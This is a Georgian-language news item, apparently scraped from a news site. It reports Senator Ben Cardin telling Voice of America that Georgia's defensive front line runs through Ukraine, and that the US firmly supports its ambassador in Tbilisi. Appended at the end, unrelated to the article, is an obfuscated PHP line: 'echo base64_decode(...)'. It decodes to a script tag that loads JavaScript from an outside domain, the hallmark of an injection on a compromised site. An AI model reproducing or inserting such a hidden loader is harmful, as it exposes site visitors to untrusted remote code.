celsiusi
ავერსი საქკაბელი
საქართველოს თავდაცვის ფრონტის ხაზი ახლა უკრაინაში გადის -  ამბობს სენატორი ბენ კარდინი, ჰელსინკის კომისიის თავმჯდომარე "ამერიკის ხმასთან" ინტერვიუში. 
 
სენატორი საქართველოში, ანტიდასავლურ კამპანიასაც ეხმაურება. მისი თქმით, აშშ-ს ელჩს ვაშინგტონიდან სრული მხარდაჭერა აქვს მიუხედავად იმისა, რამდენად მწვავეა განცხადებები, ამერიკა არ აპირებს დადუმდეს იმ ღირებულებებზე, რაც დემოკრატიისთვის მნიშვნელოვანია.
 
სენატორი ასევე დასძენს, რომ ქვეყანაში გარკვეული პროგრესიც შეინიშნება და საქართველო ევროინტეგრაციის გზას ადგას, თუმცა საბოლოო შედეგისთვის მეტი რეფორმაა საჭირო.
 
"საქართველო დაზარალდა რუსეთის შეჭრით და რუსული ჯარები საქართველოში დღემდე იქ დგანან. მათ [ქართველებმა] იციან რას ნიშნავს, როდესაც ზესახელმწიფოს სამხედრო ძალა მოდის შენ ქვეყანაში და ძალით იტაცებს ქვეყნის ნაწილებს. ასე რომ, ისინი იაზრებენ იმას, რომ ის, რაც უკრაინაში მოხდა ამ ბოლო შეჭრამდე, მოხდა მათ ქვეყანასა და მოლდოვაშიც.
 
ის რაც ახლა უკრაინაში ხდება არის ფრონტის ხაზი საქართველოს თავდაცვისთვის, რადგან თუ რუსეთი შეძლებს, რომ წინ წავიდეს ამ სამხედრო კამპანიაში, მაშინ საქართველო და მოლდოვა ნამდვილად იქნებიან რუსეთის შემდეგი სამხედრო აგრესიის მსხვერპლი...
 
ჩვენ მტკიცედ ვუჭერთ მხარს ჩვენს საელჩოს და ჩვენს ელჩს საქართველოში. არც ისე მგრძნობიარეები ვართ კრიტიკის მიმართ, რომელიც ამერიკელების, თუ ჩვენი წარმომადგენლების მისამართით ჟღერს. თუმცა ვფიქრობ, რომ ქვეყანა, რომელიც ევროპაში გაწევრიანებას ცდილობს, ისეთ საკითხებს თავს გაართმევს, რომლებიც ჩვენ გვაშფოთებს..." - ამბობს სენატორი.
464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");